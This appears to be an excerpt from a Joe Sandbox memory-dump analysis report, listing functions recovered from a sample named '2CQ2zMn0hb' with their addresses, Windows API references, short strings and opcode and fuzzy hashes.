Function 376396B8 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

0^7, xrefs: 376399A4

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 0^7
API String ID: 0-4112476546
Opcode ID: 211fb799be8e225dda834b0e2a75d801fedee735a57fd7d63865aea647f9b78d
Instruction ID: 0df9c4587132ffd1c003101f8671091ae2dc9f0cf08d39754f6b115f18d82c5e
Opcode Fuzzy Hash: 211fb799be8e225dda834b0e2a75d801fedee735a57fd7d63865aea647f9b78d
Instruction Fuzzy Hash: 8171A3B5E016188FEB58CF66C944B99FBF2AF88304F14C1AAD40CB7265DB345A85CF11

Function 37630040 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad63a367b4977b0676ffcef776ed65b4850e4059a292fdf8e4922bccfc60c172
Instruction ID: 5c079a884d2823718ded3e22e6184936d601ed30a56186d03c96cbfd34e02a7b
Opcode Fuzzy Hash: ad63a367b4977b0676ffcef776ed65b4850e4059a292fdf8e4922bccfc60c172
Instruction Fuzzy Hash: B5826A74E012298FDB64DF69DD94BD9BBB2BF89300F1081E9984DA7261DB306E85CF41

Function 37638650 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a50074e817937d6f7531711c3b2325cfce2efa564ca2f814bd0a8466a1fbce
Instruction ID: d107031cec281d7b3b8a6d2bb7e151656ed0dc98791b67be50370b467aa6b8c3
Opcode Fuzzy Hash: 54a50074e817937d6f7531711c3b2325cfce2efa564ca2f814bd0a8466a1fbce
Instruction Fuzzy Hash: 6A72CF74E012298FEB65CF69C990BD9BBB2BF49301F5091E9D409A7361DB34AE81CF50

Function 348AC638 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1999fb303fbfbf06c7d6a4ed51696134d6bb4a3e02757dcac51b058fb0ed18
Instruction ID: a60fdeee3d186961852c1b58d9d251101ac65c8131a28735697a905a5c156097
Opcode Fuzzy Hash: 0d1999fb303fbfbf06c7d6a4ed51696134d6bb4a3e02757dcac51b058fb0ed18
Instruction Fuzzy Hash: 64E1C274E01218CFEB54CFA9D984B9DBBB2BF49300F2081A9D419B73A1DB755A86CF11

Function 348A03C4 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b8a25c4e9ab9e95b0d1f760524175495c8e9fae4c8461ced7d3e2af8945cd8
Instruction ID: f15ccea35a58e9cf9f785b03e118a69e2ddbc662db415d6d4265954e808c431f
Opcode Fuzzy Hash: 61b8a25c4e9ab9e95b0d1f760524175495c8e9fae4c8461ced7d3e2af8945cd8
Instruction Fuzzy Hash: AFC1AE74E01218CFDB54DFA5D994B9DBBB2FF89300F1081A9D809A73A5DB359A86CF10

Function 348A0F6F Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb7e867572505952dedade22782af11fd7171e5f3ba0e95cf0fca7ed53de7158
Instruction ID: d994d4822d537708e4d4e71466c2a907ce6c514992d549b8c652d024ede945b8
Opcode Fuzzy Hash: fb7e867572505952dedade22782af11fd7171e5f3ba0e95cf0fca7ed53de7158
Instruction Fuzzy Hash: BB91D074E00218CFEB10DFA8C994B9CBBB1FF49315F209269E409BB291DBB59985CF15

Function 3763BA97 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de1a3d07a71a081fc9a08c662e4a27fd808397c50f514baf7ee25d2850942dda
Instruction ID: db42ded18169a57bdc7bf9be742a473549292d47424e0addea9e5b6a77a00148
Opcode Fuzzy Hash: de1a3d07a71a081fc9a08c662e4a27fd808397c50f514baf7ee25d2850942dda
Instruction Fuzzy Hash: 47810674E01208CBEB14DFA9D9506DDBBF2BF88310F64D529D418AB365DB349942CF51

Function 37638640 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0763dd30b19577fc9b511dbbeee3fdce587ba8b2157f549fba43fba57f31a92
Instruction ID: 9d886cf95f6179f3f7c587c0bc6708efe048de6156d9a5fcd0d75b2842dd2e60
Opcode Fuzzy Hash: d0763dd30b19577fc9b511dbbeee3fdce587ba8b2157f549fba43fba57f31a92
Instruction Fuzzy Hash: 8C71C475D02229CFDB24CF66D9847DDBBB2BF89311F1091AAD408A7360DB346A82CF40

Function 37B6F316 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074f94d8a07f27f4218629830c7558c146b22786a044e7f345ec0ace5c913195
Instruction ID: a71d23ef54e8500f3c5c0a845762ba209031826371cea575f87fec7dd5b55be6
Opcode Fuzzy Hash: 074f94d8a07f27f4218629830c7558c146b22786a044e7f345ec0ace5c913195
Instruction Fuzzy Hash: FF614674A40219CFDB25DF64E994BADFBB6FF88300F1084A99809637A5DE356D82DF04

Function 37639D00 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e8e9267378b7bf7b74f3373982d27e09b60e7c56b87484f029268fb4f5ca9e
Instruction ID: ee151345ca72b22f97fe7cda2321a0d9b349486c1e78df8fcc2e858ae3227311
Opcode Fuzzy Hash: 74e8e9267378b7bf7b74f3373982d27e09b60e7c56b87484f029268fb4f5ca9e
Instruction Fuzzy Hash: 8F418AB1D016188BEB58CF6BCD557C9FAF3AFC9314F04C1AAD40CA6265EB740A868F51

Function 3763A352 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a37ab78b365a65268223a8372b94474dbae985a37b41f777fb1dc6838425011
Instruction ID: 4e38de608f6f765d923c0e08b72c18a9cab6f89bbc5f23b0dd004abfd1433f1b
Opcode Fuzzy Hash: 1a37ab78b365a65268223a8372b94474dbae985a37b41f777fb1dc6838425011
Instruction Fuzzy Hash: D24169B1D016189BEB58CF6BCD457CAFAF3AFC8310F04C1AAD50CA6265DB740A868F51

Function 37B60980 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 37B609FE
GetCurrentThread.KERNEL32 ref: 37B60A3B
GetCurrentProcess.KERNEL32 ref: 37B60A78
GetCurrentThreadId.KERNEL32 ref: 37B60AD1

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 84d51434cc7fcd924bde4268f39c76653107073f0c6812dd7c10da6a112dc6d3
Instruction ID: d96c418490fd7766c7584a4b3180466a771e602d9c86a1bf19f4b665ba93ed41
Opcode Fuzzy Hash: 84d51434cc7fcd924bde4268f39c76653107073f0c6812dd7c10da6a112dc6d3
Instruction Fuzzy Hash: EC5166B0A006099FDB44DFAAC548BAEBBF5EF48314F208459E159A7361D738A980CF65

Function 3763D548 Relevance: 5.2, Strings: 4, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)_7, xrefs: 3763D67C
4']q, xrefs: 3763D5CA
dr7, xrefs: 3763D56D
4']q, xrefs: 3763D5ED

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 4']q$4']q$dr7$)_7
API String ID: 0-2804609785
Opcode ID: ca9f6d6151774a99df1f7947e96b9ed6d9c57c48bef0c723f22e17633834c7a1
Instruction ID: 800b1022d79f6e034a214f275dbd4c5fc3ad1f780ac211b966a8c928a0f221da
Opcode Fuzzy Hash: ca9f6d6151774a99df1f7947e96b9ed6d9c57c48bef0c723f22e17633834c7a1
Instruction Fuzzy Hash: 47518270A002099FCB05EFA8D951AEEBBB2FF85300F108565D046BB366DB35AE45CF61

Function 37637920 Relevance: 3.9, Strings: 3, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<C7, xrefs: 37637B22
<C7, xrefs: 37637AEB
<C7, xrefs: 376379D4

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: <C7$<C7$<C7
API String ID: 0-2435148349
Opcode ID: 91add3d1d1fa68d308dd9617e12d63132576583094770ee512bc4782090adb7b
Instruction ID: 6200d98cffc38cef7bd81ba54d681b40869d8a181e3d1e0f9e916a0e26a8afd1
Opcode Fuzzy Hash: 91add3d1d1fa68d308dd9617e12d63132576583094770ee512bc4782090adb7b
Instruction Fuzzy Hash: EF512574D01318DFDB14DFA5D994AADBBB2FF88300F208529E809AB365DB356946CF41

Function 00164F00 Relevance: 2.8, Strings: 2, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 0016501E
Haq, xrefs: 00164FEB

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: 0e1009aff33eb54d5ea18a2396392a208350fffd9a4e06d9bdbe62934cfe6ce3
Instruction ID: 87d5a7edf0c24aa9d220fdf085374bb65d35074ca4fa86c6bdfc11fda9efba80
Opcode Fuzzy Hash: 0e1009aff33eb54d5ea18a2396392a208350fffd9a4e06d9bdbe62934cfe6ce3
Instruction Fuzzy Hash: 95B1DF343046518FDB199F38CC94B6A7BE3AF89304F15856AE846CB3A5CB34CD92DB91

Function 00165460 Relevance: 2.7, Strings: 2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 00165540
,aq, xrefs: 00165536

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: 32d0b03e07bcadb4fe831dd70cb96cfce0efd3595b6f004ef6b4edda8f82dd07
Instruction ID: 91eac341e7ea6f02cc624f7a6dc7516f9f63d731df3e362d10f886fcfd817c97
Opcode Fuzzy Hash: 32d0b03e07bcadb4fe831dd70cb96cfce0efd3595b6f004ef6b4edda8f82dd07
Instruction Fuzzy Hash: D5816C34A009068FCB18CF69CD889AAB7B3BF89315F658169D416DB365DB31EC51CFA0

Function 37637922 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

<C7, xrefs: 37637B22
<C7, xrefs: 37637AEB

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: <C7$<C7
API String ID: 0-2317564668
Opcode ID: fd7037d842c3645b2f4b24059653b720b9ea74eb01f88c4836aa3d6dc8db035d
Instruction ID: 1bd85140c4f5174951fb2e66cafe223faba00b45ca8efa16eb02f4f2331ad268
Opcode Fuzzy Hash: fd7037d842c3645b2f4b24059653b720b9ea74eb01f88c4836aa3d6dc8db035d
Instruction Fuzzy Hash: 76212470D02318DFEB00CFA5D4547EEBBB2AF89304F508429E415BB290DB745A8ACF51

Function 00168D19 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4']q, xrefs: 00168D44
4']q, xrefs: 00168D2D

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: cc242fcd0937e7e060f8822dc71561bb7d76bc92bb73f3f10706ada5e6d9adea
Instruction ID: e67a6c7aaeecd4ecaffa88befa96b91d9952121c0a5fb09110c44e6b287c497c
Opcode Fuzzy Hash: cc242fcd0937e7e060f8822dc71561bb7d76bc92bb73f3f10706ada5e6d9adea
Instruction Fuzzy Hash: 25F0C2353002142FDB081AAA9C5497B7ACBEFCC3A0B048529F90AC73A0DE75CC1183B1

Function 37B60104 Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37B60222

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2854258950e32f86112038a27cdb4eb05f520aa061073606d2906b2ceeecc964
Instruction ID: 6f9d36e30d27b3bd9750590306e374f346e87d2e051d4d1fdd5696055e117a33
Opcode Fuzzy Hash: 2854258950e32f86112038a27cdb4eb05f520aa061073606d2906b2ceeecc964
Instruction Fuzzy Hash: 6751D3B1D00359DFDB14CF9AC884ADEBBB6FF48314F24812AE919AB210D775A941CF91

Function 37B60110 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37B60222

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f1f69abbb7c591018e1f8e0b18dd24641884bad9f0b09c794e68296cdc158b76
Instruction ID: 74bac136d581a3c994b277632ed76f2924e865df36ac1df71b8f48288b217708
Opcode Fuzzy Hash: f1f69abbb7c591018e1f8e0b18dd24641884bad9f0b09c794e68296cdc158b76
Instruction Fuzzy Hash: 1841D0B1D00319DFDB14CF9AC884ADEBBB6FF48314F24812AE519AB210D774A841CF90

Function 37B61DC0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 37B61E81

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b58e089b49ecd3fd127bc0a6fd898d76d5510cc7e4d2e4a0fa52c24b3ea6b64e
Instruction ID: ac731c3533ad94093c189f0933c8897a5b13d33530fe80ed003fb77012e7de77
Opcode Fuzzy Hash: b58e089b49ecd3fd127bc0a6fd898d76d5510cc7e4d2e4a0fa52c24b3ea6b64e
Instruction Fuzzy Hash: E24118B9A00309DFDB04CF99C448AAABBF5FF89314F24C459D559AB321D774E841CBA0

Function 37B60BC0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37B60C4F

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 135e06acf9ce755bf944d8d93c26b6f9b51b8c8f61452dc6f9c42052807001fd
Instruction ID: 16d9e72325da821cb31e52d0f98ac678823fc3d848a8bf292b8ffb3ee304cc61
Opcode Fuzzy Hash: 135e06acf9ce755bf944d8d93c26b6f9b51b8c8f61452dc6f9c42052807001fd
Instruction Fuzzy Hash: 0321E6B5900248AFDB10CFAAD584ADEFFF5EF48320F14841AE959A7310D379A950CFA5

Function 37B60BC8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37B60C4F

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5192354fe832f5d0cc6f0435d489a3741c574a06a2e5b42b2e39df63ae748edf
Instruction ID: 14416ec32cf0b83c76e71ec150658de4872b3362b2e41239c2a7f094a735af8b
Opcode Fuzzy Hash: 5192354fe832f5d0cc6f0435d489a3741c574a06a2e5b42b2e39df63ae748edf
Instruction Fuzzy Hash: BA21C4B5900258AFDB10CFAAD584ADEFFF5EB48320F14841AE959A3310D378A950CFA5

Function 348A7C2C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 348A7D6E

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a74f1bcf92f35a38de45389bcc4ebc859adb52ab1212b84a58c67a40f055476
Instruction ID: 328a67205f4a3c2f91a0eeabc19da10b54187002d455412f14088e45535d34c2
Opcode Fuzzy Hash: 7a74f1bcf92f35a38de45389bcc4ebc859adb52ab1212b84a58c67a40f055476
Instruction Fuzzy Hash: 52117F74E012098FEB04CFA8D880AEDBBB5FF88305F548219E814A7246D7B0ED41DB50

Function 37B62018 Relevance: 1.5, APIs: 1, Instructions: 49timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,?,?), ref: 37B6207D

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 2a76d23a67fdd1ab2e515e60db373c1f0a54efd5c622ca041a8ecc5eed6f7a02
Instruction ID: 5a049d4466a5a4aab629ebf1c45dc488d6cf2e3f79361f50942984b93150d7ce
Opcode Fuzzy Hash: 2a76d23a67fdd1ab2e515e60db373c1f0a54efd5c622ca041a8ecc5eed6f7a02
Instruction Fuzzy Hash: 6F11E3B58003499FDB10DF99D545BDEBBF8EB49720F108459D559A7200C379A580CFA1

Function 37B6D3E8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 37B6D445

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5ecbb16be5b8343cb13d274f8b31384354eb49c466972465c46539a996fd14fe
Instruction ID: 81fc5d94f62a378052a705b64a8ed9fec34564a60d59c20ad3125bec25f76ac5
Opcode Fuzzy Hash: 5ecbb16be5b8343cb13d274f8b31384354eb49c466972465c46539a996fd14fe
Instruction Fuzzy Hash: 971133B19007488FCB10DFAAD548BDEFBF4EB48324F20845AD519B7200C378A981CFA5

Function 37B6E700 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,37B6D92F), ref: 37B6E765

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 38107959d167c59ff679f039bcabbeec4aea89ab06e7313fc59ea59923368fde
Instruction ID: 82c503fcccafb424816ccfe6d06e208bb82476d14e9c4b088b902453c1f5fb27
Opcode Fuzzy Hash: 38107959d167c59ff679f039bcabbeec4aea89ab06e7313fc59ea59923368fde
Instruction Fuzzy Hash: 50111DB5C006498FDB10DFAAD544BDEFBF4EB88324F10842AD569A7240C378A540CFA1

Function 37B6C60C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,37B6D92F), ref: 37B6E765

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: b64146e632fb7f360303ee906baf6fdece686882ff729d0e1bfac5405c2cda5a
Instruction ID: 593a1681cb5476064422bdc2a8757d7e56f16d347bf8cd5fc31f282efcd0af11
Opcode Fuzzy Hash: b64146e632fb7f360303ee906baf6fdece686882ff729d0e1bfac5405c2cda5a
Instruction Fuzzy Hash: 0011EDB5C047489FDB10DF9AD588BAEFBF4EB49328F10846AE519B3210D378A544CFA5

Function 37B6C560 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 37B6D445

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: efdb2d5fb7da3e0cadc685e48513199b91455a444e1b4691f6b855efaeebf19b
Instruction ID: 15de79247b58200fb4d69406aefd7b1e1197a7ba3b1eef968dfdc31436db0ef3
Opcode Fuzzy Hash: efdb2d5fb7da3e0cadc685e48513199b91455a444e1b4691f6b855efaeebf19b
Instruction Fuzzy Hash: 171133B18003488FDB10DF9AC548B9EBBF4EB48324F208459D619B3200C378A940CBA5

Function 37B62020 Relevance: 1.5, APIs: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,?,?), ref: 37B6207D

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 68a00c887cb6bed38ddcc0e6d43016e5d0a94e400b6415fa5b7fdfe3e2d24689
Instruction ID: 1cf91f15f3ebdb0b77b6a03b5968cf6ae28990cf1e8ffe64dfacc3595d2f48ee
Opcode Fuzzy Hash: 68a00c887cb6bed38ddcc0e6d43016e5d0a94e400b6415fa5b7fdfe3e2d24689
Instruction Fuzzy Hash: 5B11E5B5800349DFDB10DF9AD545BDEFBF8EB48320F108419D959A7610C379A584CFA1

Function 00160B29 Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

LR]q, xrefs: 00160B62

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 60c822a601c6451bfb75c097733bb7e9d50a78ac3eba249e4f1d4f5dc2fcc57b
Instruction ID: 9b6a226dee6feb4f81f8b4376552090b0304bf7fbd9c755dbd2607f3c64a489c
Opcode Fuzzy Hash: 60c822a601c6451bfb75c097733bb7e9d50a78ac3eba249e4f1d4f5dc2fcc57b
Instruction Fuzzy Hash: BEA1A774A10209DFCB04DFA8E995A9DBBB6FF48305B104629E406A73B5DF74A946CF80

Function 00160B30 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

LR]q, xrefs: 00160B62

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: cda87197a679c5e249ca4f90fa80dde44028e40ab687e025013045b5986b8b5b
Instruction ID: c2a7c9045cf332288f37c0ac8c29d885bfafd693637a9507270af082e4994d44
Opcode Fuzzy Hash: cda87197a679c5e249ca4f90fa80dde44028e40ab687e025013045b5986b8b5b
Instruction Fuzzy Hash: D8A19674A10209DFCB04DFA8E995A9DBBB6FF48305B104629E406A73B5DF74A946CF80

Function 3763FAB0 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

g7, xrefs: 3763FAD1

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: g7
API String ID: 0-613781846
Opcode ID: 0069f9ab9ff915c1f15f746289973c5add0965b7a37a1d18c7452148373654aa
Instruction ID: c707b897b7665f74ac5149ddedc2cf0f8789c153af8d894869d4d52f119757cf
Opcode Fuzzy Hash: 0069f9ab9ff915c1f15f746289973c5add0965b7a37a1d18c7452148373654aa
Instruction Fuzzy Hash: 697119B4E01619DFDB45DFB5C9585ADBBF2FF88300F11812AD406AB2A0DB389942CF41

